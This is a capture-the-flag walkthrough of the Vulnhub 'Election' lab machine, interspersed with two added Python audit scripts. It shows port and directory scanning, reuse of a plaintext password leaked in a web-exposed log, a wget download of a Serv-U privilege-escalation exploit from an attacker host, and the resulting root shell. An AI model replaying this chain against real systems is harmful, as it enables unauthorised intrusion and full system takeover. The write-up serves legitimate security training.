[VLN] eLection

Today we are going to hack the Vulnhub machine called Election. You can download it from the following link: https://www.vulnhub.com/entry/election-1,503/
  • Enumeration
    We start with an nmap scan to see which ports are open.
    ~ > nmap -A -p- 192.168.1.101
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-26 16:54 CEST
    Nmap scan report for election.home (192.168.1.101)
    Host is up (0.019s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
    |   256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
    |_  256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Apache2 Ubuntu Default Page: It works
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 10.72 seconds
    We take a look at the Apache server's robots.txt, which lives at http://192.168.1.101/robots.txt. It contains the following:
    admin
    wordpress
    user
    election
    We see there is a directory called "election", so we use gobuster to dig a little deeper.
    ~ > gobuster dir -u http://192.168.1.101/election -w /usr/share/wordlists/dirb/big.txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.1.101/election
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/big.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/07/26 17:07:18 Starting gobuster
    ===============================================================
    /.htaccess (Status: 403)
    /.htpasswd (Status: 403)
    /admin (Status: 301)
    /data (Status: 301)
    /js (Status: 301)
    /languages (Status: 301)
    /lib (Status: 301)
    /media (Status: 301)
    /themes (Status: 301)
    ===============================================================
    2020/07/26 17:07:22 Finished
    ===============================================================
    It returns several directories; judging by the names, the most interesting one is admin. We run gobuster again against it.
    ~ > gobuster dir -u http://192.168.1.101/election/admin -w /usr/share/wordlists/dirb/big.txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.1.101/election/admin
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/big.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/07/26 17:08:03 Starting gobuster
    ===============================================================
    /.htaccess (Status: 403)
    /.htpasswd (Status: 403)
    /ajax (Status: 301)
    /components (Status: 301)
    /css (Status: 301)
    /img (Status: 301)
    /inc (Status: 301)
    /js (Status: 301)
    /logs (Status: 301)
    /plugins (Status: 301)
    ===============================================================
    2020/07/26 17:08:06 Finished
    ===============================================================
    A logs directory shows up! Visiting http://192.168.1.101/election/admin/logs/ we see a file called system.log. Downloading it, we find that it contains:
    [2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
    [2020-04-03 00:13:53] Love added candidate 'Love'.
    [2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).
    We can see what look like credentials: love/P@$$w0rd@123. Let's try connecting over ssh with them.
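The real finding here is an application log that records a plaintext password and is served from a web-reachable directory. As an added example (not from the original post), here is a small scanner a defender could run over such logs to flag credential-leaking entries without copying the secret itself into the report; the log lines are the three recovered above, embedded as constructed sample input, and the pattern is the hypothetical "Assigned Password for the user" form this application uses.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample: the three lines recovered from the exposed system.log.
SAMPLE_LOG = """\
[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).
"""

# "[YYYY-MM-DD HH:MM:SS] message" as used by this application's log.
LINE_RE = re.compile(r"^\[(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\] (.*)$")
# Hypothetical pattern matching the password-assignment message seen on this box.
SECRET_RE = re.compile(
    r"assigned password for the user (?P<user>\S+?):\s*(?P<secret>\S+)", re.IGNORECASE
)

@dataclass
class Finding:
    timestamp: str
    user: str
    masked_secret: str  # report never contains the plaintext secret

def mask(secret: str) -> str:
    """Keep first and last character so an analyst can match the entry to its source."""
    if len(secret) <= 2:
        return "*" * len(secret)
    return secret[0] + "*" * (len(secret) - 2) + secret[-1]

def scan_log(text: str) -> List[Finding]:
    """Return one Finding per log line that records a password in the clear."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected timestamped form
        ts, msg = m.groups()
        s = SECRET_RE.search(msg)
        if s:
            findings.append(Finding(ts, s.group("user"), mask(s.group("secret"))))
    return findings

def unknown_ip_logins(text: str) -> int:
    """Count logins the application could not attribute to a source address."""
    return sum(1 for ln in text.splitlines() if "logged in from Unknown IP" in ln)

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.timestamp} plaintext password for '{f.user}': {f.masked_secret}")
    print("logins from Unknown IP:", unknown_ip_logins(SAMPLE_LOG))
```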
  • Low Shell
    ~ > ssh love@192.168.1.101
    The authenticity of host '192.168.1.101 (192.168.1.101)' can't be established.
    ECDSA key fingerprint is SHA256:erz9C9WEWhhV5KMnnpxYEiDQ015ORbFLU/4HNeyevdQ.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '192.168.1.101' (ECDSA) to the list of known hosts.
    love@192.168.1.101's password:
    Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-46-generic x86_64)

     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage

     * "If you've been waiting for the perfect Kubernetes dev solution for
       macOS, the wait is over. Learn how to install Microk8s on macOS."

       https://www.techrepublic.com/article/how-to-install-microk8s-on-macos/

     * Canonical Livepatch is available for installation.
       - Reduce system reboots and improve kernel security. Activate at:
         https://ubuntu.com/livepatch

    74 packages can be updated.
    28 updates are security updates.

    Your Hardware Enablement Stack (HWE) is supported until April 2023.
    Last login: Thu Apr  9 23:19:28 2020 from 192.168.1.5
    love@election:~$
    We take a look around the system, starting with the setuid binaries.
    love@election:~$ find / -perm -4000 2>/dev/null
    ---SNIP---
    /usr/bin/chfn
    /usr/bin/gpasswd
    /usr/bin/sudo
    /usr/sbin/pppd
    /usr/local/Serv-U/Serv-U
    /usr/lib/policykit-1/polkit-agent-helper-1
    /bin/fusermount
    ---SNIP---
    One executable stands out: "Serv-U", a third-party binary installed under /usr/local with the setuid bit. After a quick search we find an exploit[1] for it that may be useful. We download it to our machine and transfer it to the victim.
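What made Serv-U stand out in that listing is that it is a setuid-root binary outside the package-managed paths. As an added example (not from the original post), this script automates that judgement for a defender: it walks the filesystem for setuid files and reports any that are not in a baseline of distribution-shipped ones, with extra emphasis on third-party locations. The baseline set and the prefix list are assumptions for illustration; the sample listing is the (snipped) find output from this box, embedded as constructed input.

```python
import os
import stat
from typing import Iterable, List, Tuple

# Constructed sample: the setuid files listed by `find / -perm -4000` on this box.
SAMPLE_SUID = """\
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/sbin/pppd
/usr/local/Serv-U/Serv-U
/usr/lib/policykit-1/polkit-agent-helper-1
/bin/fusermount
"""

# Hypothetical baseline of setuid files shipped by the distribution's own packages.
# On a real host derive it from package metadata rather than hard-coding it.
BASELINE = {
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/sbin/pppd",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/bin/fusermount",
}

# Package managers normally install nothing here; a setuid-root file under these
# prefixes is almost always third-party software and deserves a closer look.
THIRD_PARTY_PREFIXES = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/srv/")

def find_suid(root: str) -> List[str]:
    """Return regular files under `root` with the setuid bit (lstat: symlinks not followed)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry; skip rather than abort the audit
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)

def audit(paths: Iterable[str], baseline=BASELINE) -> List[Tuple[str, str]]:
    """Return (path, reason) for every setuid file that is not in the package baseline."""
    report = []
    for p in (x.strip() for x in paths):
        if not p or p in baseline:
            continue
        reason = "third-party location" if p.startswith(THIRD_PARTY_PREFIXES) else "not in baseline"
        report.append((p, reason))
    return report

if __name__ == "__main__":
    for path, why in audit(SAMPLE_SUID.splitlines()):
        print(f"REVIEW {path}: {why}")
```

To run it against a live host, replace the sample with `audit(find_suid("/"))`.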
  • Privilege Escalation
    love@election:~$ wget http://192.168.1.111/47009.c
    --2020-07-26 20:51:47--  http://192.168.1.111/47009.c
    Connecting to 192.168.1.111:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 619 [application/octet-stream]
    Saving to: ‘47009.c’

    47009.c             100%[=========================>]     619  --.-KB/s    in 0s

    2020-07-26 20:51:47 (85.6 MB/s) - ‘47009.c’ saved [619/619]
    We compile it!
    love@election:~$ gcc -o go 47009.c
    And run it :)
    love@election:~$ ./go
    uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)
    opening root shell
    # id
    uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)
  • root.txt
    # cd /root
    # ls
    root.txt
    # cat root.txt
    5238feefc4ffe09645d97e9ee49bc3a6
  • End
    And with that we are root on the machine.

    [1] https://www.exploit-db.com/exploits/47009